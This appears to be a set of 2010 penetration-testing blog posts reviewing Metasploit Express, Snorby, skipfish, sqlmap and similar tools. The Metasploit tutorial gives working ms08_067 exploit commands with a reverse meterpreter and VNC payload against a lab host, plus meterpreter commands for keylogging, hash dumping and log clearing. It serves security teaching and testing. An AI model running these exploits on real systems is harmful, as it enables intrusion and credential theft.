That is almost as cool as Nmap being used in the Matrix.

The National Security Agency and the Central Security Service tested the five U.S. service academies during the 2009 Cyber Defense Exercise.Teams were tested on their ability to defend computer networks the students designed themselves. The winner took home the coveted CDX trophy. In an unclassified movie produced by the NSA, we caught a glimpse of BackTrack being used in the CyberDefence 2009 Wargames.

http://www.backtrack-linux.org/backtrack/backtrack-used-by-the-nsa/

The purchase of Metasploit by Rapid7 last year and the recent release of Metasploit Express has been big news in the security community.

I have finally gotten around to giving it a spin. So what is Metasploit Express? It is a web based front end for Metasploit that provides not only easy access to the underlying tool it also adds reporting and organisation to your penetration testing. Allowing projects to be saved, results stored and tested.

Sure does beat running metasploit and using a flat text file for your project database.

I grabbed a copy of the Trial Version from the Metasploit website.

#chmod +x metasploit-3.4.0-linux-x64-installer.bin
# ./metasploit-3.4.0-linux-x64-installer.bin

Install was gui based and simple enough. Following the installation I was directed to web based console.

https://localhost:3790/

Create a user account.

Enter Product Key and Activate with Rapid7.com. A friendly reminder that we are in the world of commercial software.

Created Test1 and ran the initial scan

Resource usage is very low during scanning phase. Memory usage considerably less than firefox and barely touched the sides of CPU on my old Core2duo.

Against my 3 hosts I ran the brute force module. All settings are defaults.

Note the windows host has login Administrator with password test and admin with password. The Linux host has password of test on the root account.

I was surprised that these were not discovered during the brute scans.

I redid the brute force module after changing the root password to “toor”. Success! It seems the dictionary may not have been large enough for root / test.

Update: as noted by HD Moore selecting the deep option rather than default on the brute force would have hit on “test”.

Using the session from the brute forced credentials I was able to gather data from the system with prebuilt scripts and get full access via a shell.

Onto the exploitation module.

Session found on the windows XP host as expected ms08_067 was successfully exploited.

Switching to the session tab (nice that while scans are running you can move about the console) reveals prebuilt modules that can be performed with the session – collect system data, virtual desktop, access file system, and command shell. These are straight out of meterpreter.

I grabbed some system data and found the display of the collected data is clear and easy to get to.

Accessing the virtual desktop I was able to connect using a java applet, the other choice to manually use a vnc viewer was also available.

Browsing the file system is all web based, fast and responsive, allowing browsing of the system drives looking for data to snarf.

Lastly direct access to the meterpreter shell is right there, giving you full access to the session through the web console.

Reports linked here
Executive Summary
Detailed Audit Report
Compromised Hosts
Collected Evidence
Network Services
Authentication Tokens

During my testing I did not have a working NexPose Vulnerability Scanner install, however note that this is also an option for enumeration of the vulnerabilities and would be interesting to see in action.

Overall this is a quality product, utilising the underlying framework the web based front end is solid enhancement that is definitely worth the price, whether you are running metasploit on a daily basis and need access to the reporting and backend database or if you run it occasionally within your environment this puts the power of the tool only a few clicks away.

It is a new web interface for Snort that is very pretty, but also simple. An excellent introduction to Intrusion Detection Systems, that is not going to scare anyone away.

Now how to I get hold of this I hear you cry…. head over here and grab the preconfigured security appliance.

I downloaded the iso, fired up a virtualbox machine and away it went. Seriously a working Snort install in under 10mins. Nice!

Obviously you want to test your snort, so I fired off an nmap scan with the script option against my Windows XP SP2 test machine.

# nmap -sC 192.168.56.101

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-06-02 10:19 EST
Nmap scan report for 192.168.56.101
Host is up (0.0032s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:22:22:22:22:22

Host script results:
|_nbstat: NetBIOS name: ASDF, NetBIOS user: , NetBIOS MAC: 22:22:22:22:22:22
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\ASDF
|_ System time: 2010-06-02 10:19:58 UTC-7
|_smbv2-enabled: Server doesn’t support SMBv2 protocol

Nmap done: 1 IP address (1 host up) scanned in 12.09 seconds

Snorby showed me some nice port scan alerts.

Now I was running through my guide to Metasploit 3.4.0 and figured I would see something in Snorby. As shown in the guide I successfully ran metasploit with ms08_067 exploit using a meterpreter payload and a vnc dll injection payload. Gaining full access to the Windows XP SP2 machine.

Snorby (and Snort) results show nothing.

Hmm, Snorby is running with up to date rules from emerging threats and snort. I was quite surprised and will be looking into the reasons for this in the near future. I would have thought I would have triggered something in the snort rules during this exploit.

Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with Core Impact and Canvas in the pen-testing community.

The latest version has recently been released so I thought I would give you a quick and dirty introduction to running it on Ubuntu Linux 10.04. Of course it will run just as easily on Fedora Linux, Windows or whatever Operating System floats your boat.

Download the framework from http://www.metasploit.com/framework/download/

I chose the binary version for 64 bit Linux.

Ruby is not installed by default in Ubuntu so start off with:

apt-get install ruby
chmod +x framework-3.4.0-linux-x86_64.run
./framework-3.4.0-linux-x86_64.run
Verifying archive integrity… All good.
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)……..

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 “888 “88bd8P Y8b888 “88b88K 888 “88b888d88″”88b888888
888 888 88888888888888 .d888888″Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 “Y8888 “Y888″Y888888 88888P’88888P” 888 “Y88P” 888 “Y888
888
888
888

Metasploit Framework v3.4.0 Release
Report Bugs: msfdev@metasploit.com

Warning: A copy of Metasploit already exists at /opt/metasploit3
continuing this installation will DELETE the previous
install, including all user-modified files.

Please enter ‘yes’ to continue or any other key to abort
Continue (yes/no) > yes

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Removing files from the previous installation…

Extracting the Metasploit operating environment…

Extracting the Metasploit Framework…

Installing links into /usr/local/bin…

Installation complete.

Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes

*** snip ***

Updated to revision 9390.

Launch the Metasploit console by running ‘msfconsole’

Exiting the installer…
root@testbox:/home/testuser/Downloads# msfconsole

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ — –=[ 553 exploits - 264 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
=[ svn r9390 updated today (2010.06.01)

msf > exit

Ok, we now have a working Metasploit, hoorah for us.

Now we want to do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in Sun Virtual box using Host Only Networking as we will see shortly.

I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However if you prefer go with the msfconsole.

Running "#msfcli" will list all exploits, payloads and other modules.

#msfcli | grep 08_067
exploit/windows/smb/ms08_067_netapi

Lets hit my windows box with exploit/windows/smb/ms08_067_netapi it is stable and works very well.

#msfcli exploit/windows/smb/ms08_067_netapi
[*] Please wait while we load the module tree…
Usage: /opt/metasploit3/msf3/msfcli [mode]
========================================================================

Mode Description
—- ———–
(H)elp You’re looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module

#msfcli exploit/windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree…

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples. A reverse meterpreter and a vnc reverse dll injection.
#msfcli exploit/windows/smb/ms08_067_netapi P

My windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1.

# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree…
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (748032 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine …..
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target…
[*] Checking for contermeasures…
[*] Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe
[*] Getting Windows Built in Firewall configuration…
[*]
[*] Domain profile configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] ——————————————————————-
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*]
[*] Local Area Connection 2 firewall configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*]
[*] Checking DEP Support Policy…
meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0
Local subnet: 192.168.56.0/255.255.255.0
meterpreter > help

Core Commands
=============

Command Description
——- ———–
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Priv: Elevate Commands
======================

Command Description
——- ———–
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir 2009-12-22 05:59:31 +1100 $AVG
100777/rwxrwxrwx 0 fil 2009-12-22 05:39:51 +1100 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2009-12-22 05:39:51 +1100 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2010-02-12 15:23:25 +1100 Documents and Settings
100444/r–r–r– 0 fil 2009-12-22 05:39:51 +1100 IO.SYS
40777/rwxrwxrwx 0 dir 2010-02-11 13:11:43 +1100 Inetpub
100444/r–r–r– 0 fil 2009-12-22 05:39:51 +1100 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2004-08-04 22:00:00 +1000 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2010-04-08 15:57:51 +1000 Program Files
40777/rwxrwxrwx 0 dir 2010-04-09 13:14:56 +1000 RECYCLER
40777/rwxrwxrwx 0 dir 2009-12-22 05:43:08 +1100 System Volume Information
40777/rwxrwxrwx 0 dir 2010-04-09 13:18:19 +1000 WINDOWS
100666/rw-rw-rw- 211 fil 2009-12-22 05:35:20 +1100 boot.ini
100444/r–r–r– 250032 fil 2004-08-04 22:00:00 +1000 ntldr
100666/rw-rw-rw- 301989888 fil 2010-06-01 02:21:17 +1000 pagefile.sys

The power of the meterpreter is really only limited by your imagination. Keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline…..

Now for a vnc injection.

# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree…
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900…
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “snipped”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)

This should pop up a vnc session with full desktop control of your Windows XP SP2 Host. This is a good dramatic way to show people the power of metasploit and to reinforce the need for patching to your users.

I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.

For our readers who are not familiar with Metasploit this maybe a little advanced. However you should still be aware of how relatively easy this sort of attack can be. After all the weakest point in most organisations is the end user.

The guys at offensive-security.com have a put some metasploit training online and the guide to the Social Engineering Toolkit (SET) is a good step by step tutorial to using the tool and exploiting clients.

Depending on the guidelines of your Pen-Test, attacking the client is often a valuable entry point into the entire network. Frankly once you get the client there is little stopping you from taking the whole network.

SET Social Engineering Toolkit

So a new project hosted over at googlecode is an excellent addition to any vulnerability scanning toolbox.

CMS Explorer searches a site for installed plugins and if you supply an OSVDB.org API key, it will even correlate found plugins with those that are vulnerable.

Requirements
* PERL 5.x
* Getopt::Long
* LibWhisker2 (included)
* OSVDB API key (free for 100 queries per day)

Installation
* Unpack archive
* Create the file ‘osvdb.key’ in the cms-explorer directory, and put your OSVDB API key on the first line.
* run ./cms-explorer.pl to ensure no errors are reported

CMS-Explorer

What is skipfish?

Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.

Go here to download and review the documentation Skipfish.

A rough list of the security checks offered by the tool is outlined below.

* High risk flaws (potentially leading to system compromise):

o Server-side SQL injection (including blind vectors, numerical parameters).
o Explicit SQL-like syntax in GET or POST parameters.
o Server-side shell command injection (including blind vectors).
o Server-side XML / XPath injection (including blind vectors).
o Format string vulnerabilities.
o Integer overflow vulnerabilities.
o Locations accepting HTTP PUT.

* Medium risk flaws (potentially leading to data compromise):

o Stored and reflected XSS vectors in document body (minimal JS XSS support present).
o Stored and reflected XSS vectors via HTTP redirects.
o Stored and reflected XSS vectors via HTTP header splitting.
o Directory traversal (including constrained vectors).
o Assorted file POIs (server-side sources, configs, etc).
o Attacker-supplied script and CSS inclusion vectors (stored and reflected).
o External untrusted script and CSS inclusion vectors.
o Mixed content problems on script and CSS resources (optional).
o Incorrect or missing MIME types on renderables.
o Generic MIME types on renderables.
o Incorrect or missing charsets on renderables.
o Conflicting MIME / charset info on renderables.
o Bad caching directives on cookie setting responses.

* Low risk issues (limited impact or low specificity):

o Directory listing bypass vectors.
o Redirection to attacker-supplied URLs (stored and reflected).
o Attacker-supplied embedded content (stored and reflected).
o External untrusted embedded content.
o Mixed content on non-scriptable subresources (optional).
o HTTP credentials in URLs.
o Expired or not-yet-valid SSL certificates.
o HTML forms with no XSRF protection.
o Self-signed SSL certificates.
o SSL certificate host name mismatches.
o Bad caching directives on less sensitive content.

* Internal warnings:

o Failed resource fetch attempts.
o Exceeded crawl limits.
o Failed 404 behavior checks.
o IPS filtering detected.
o Unexpected response variations.
o Seemingly misclassified crawl nodes.

* Non-specific informational entries:

o General SSL certificate information.
o Significantly changing HTTP cookies.
o Changing Server, Via, or X-… headers.
o New 404 signatures.
o Resources that cannot be accessed.
o Resources requiring HTTP authentication.
o Broken links.
o Server errors.
o All external links not classified otherwise (optional).
o All external e-mails (optional).
o All external URL redirectors (optional).
o Links to unknown protocols.
o Form fields that could not be autocompleted.
o Password entry forms (for external brute-force).
o File upload forms.
o Other HTML forms (not classified otherwise).
o Numerical file names (for external brute-force).
o User-supplied links otherwise rendered on a page.
o Incorrect or missing MIME type on less significant content.
o Generic MIME type on less significant content.
o Incorrect or missing charset on less significant content.
o Conflicting MIME / charset information on less significant content.
o OGNL-like parameter passing conventions.

If you are not familiar with the power of sqlmap head over to the sourceforge site for demo videos and some top notch documentation. Our scanning tools are configured to discover sql injection holes. However the full power of sqlmap allows you move into the exploitation phase and take over a server – an excellent tool for penetration testing and showing management how serious sql injection holes can be. New features include integration with Metasploit.

Rainbow tables are massive collections of hashes derived from possible passwords. The rainbow table method simply compares the computed hases against your hash and if you are (un)lucky you will get the password.

Here is a sample of MD5 search sites, that will allow you test the strength of your MD5 passwords.

http://gdataonline.com/seekhash.php
http://md5.rednoize.com/
http://www.md5search.de/

Keep the passwords complicated, and if you are writing web apps, please use a salt!

The most notably thing is how much the results vary, and how many vulnerabilities most scanners miss. Clearly using more than one scanner is necessary to be able to compare the results, and nothing can beat testing by skilled security professionals.

NTOSpider by NT Objectives came out in the lead with the best overall score of the application scanners tested (which included Acunetix, Appscan, Burp Suite Pro, Hailstorm, WebInspect, and NTOSpider). He also measured things like how long the various scanners take to configure, support and so on – all important things for companies about to make the big investment. This isn’t all scanners everywhere (notably WhiteHat is missing as is the newest player to the field, NetSparker who incidentally took it upon themselves to add themselves into the report after the fact, and other free web assessment tools, like Nikto etc…), but it’s a great start to a long future of heavily debated research, I’m sure. Love him, or hate him, Larry’s always got interesting research to share!

Accuracy and Time Costs of Web Application Security Scanner Report

I guess now would be a good time to point out that even if you cough up the money for a commercial scanner or perhaps an online scanning service such as Qualys or ControlScan getting a second opinion from a service such as ours here at HackerTarget.com is an excellent way to get a second option.